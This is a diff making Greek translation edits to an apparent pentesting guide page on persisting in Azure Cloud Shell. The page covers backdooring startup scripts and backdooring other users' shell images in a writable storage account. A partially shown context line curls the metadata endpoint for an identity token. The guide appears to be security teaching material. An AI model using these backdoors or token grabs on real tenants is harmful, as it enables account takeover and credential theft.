diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md index 0a3de7a4a..64192d9df 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md @@ -4,10 +4,10 @@ ## Cloud Shell Persistence -Azure Cloud Shell προσφέρει πρόσβαση μέσω γραμμής εντολών για τη διαχείριση πόρων Azure με μόνιμη αποθήκευση και αυτόματη αυθεντικοποίηση. Οι επιτιθέμενοι μπορούν να εκμεταλλευτούν αυτό το χαρακτηριστικό τοποθετώντας backdoors στον μόνιμο κατάλογο αρχικής: +Το Azure Cloud Shell προσφέρει πρόσβαση μέσω γραμμής εντολών για τη διαχείριση πόρων Azure με μόνιμη αποθήκευση και αυτόματη πιστοποίηση. Οι επιτιθέμενοι μπορούν να εκμεταλλευτούν αυτό το χαρακτηριστικό τοποθετώντας backdoors στον μόνιμο κατάλογο αρχικής: * **Persistent Storage**: Ο κατάλογος αρχικής του Azure Cloud Shell είναι τοποθετημένος σε ένα Azure file share και παραμένει ανέπαφος ακόμη και μετά την ολοκλήρωση της συνεδρίας. -* **Startup Scripts**: Αρχεία όπως το `.bashrc` ή `config/PowerShell/Microsoft.PowerShell_profile.ps1` εκτελούνται αυτόματα στην αρχή κάθε συνεδρίας, επιτρέποντας τη μόνιμη εκτέλεση όταν ξεκινά το cloud shell. +* **Startup Scripts**: Αρχεία όπως το `.bashrc` ή το `config/PowerShell/Microsoft.PowerShell_profile.ps1` εκτελούνται αυτόματα στην αρχή κάθε συνεδρίας, επιτρέποντας τη μόνιμη εκτέλεση όταν ξεκινά το cloud shell. Example backdoor in .bashrc: ```bash @@ -21,7 +21,7 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a ``` ### Cloud Shell Phishing -Αν ένας επιτιθέμενος βρει εικόνες άλλων χρηστών σε έναν Storage Account στον οποίο έχει δικαιώματα εγγραφής και ανάγνωσης, θα μπορέσει να κατεβάσει την εικόνα, **να προσθέσει ένα bash και PS backdoor σε αυτήν**, και να την ανεβάσει ξανά στον Storage Account ώστε την επόμενη φορά που ο χρήστης θα έχει πρόσβαση στο shell, οι **εντολές θα εκτελούνται αυτόματα**. +Αν ένας επιτιθέμενος βρει εικόνες άλλων χρηστών σε έναν Λογαριασμό Αποθήκευσης στον οποίο έχει δικαιώματα εγγραφής και ανάγνωσης, θα μπορέσει να κατεβάσει την εικόνα, **να προσθέσει ένα bash και PS backdoor σε αυτήν**, και να την ανεβάσει ξανά στον Λογαριασμό Αποθήκευσης, έτσι ώστε την επόμενη φορά που ο χρήστης θα έχει πρόσβαση στο shell, οι **εντολές θα εκτελούνται αυτόματα**. - **Download, backdoor and upload the image:** ```bash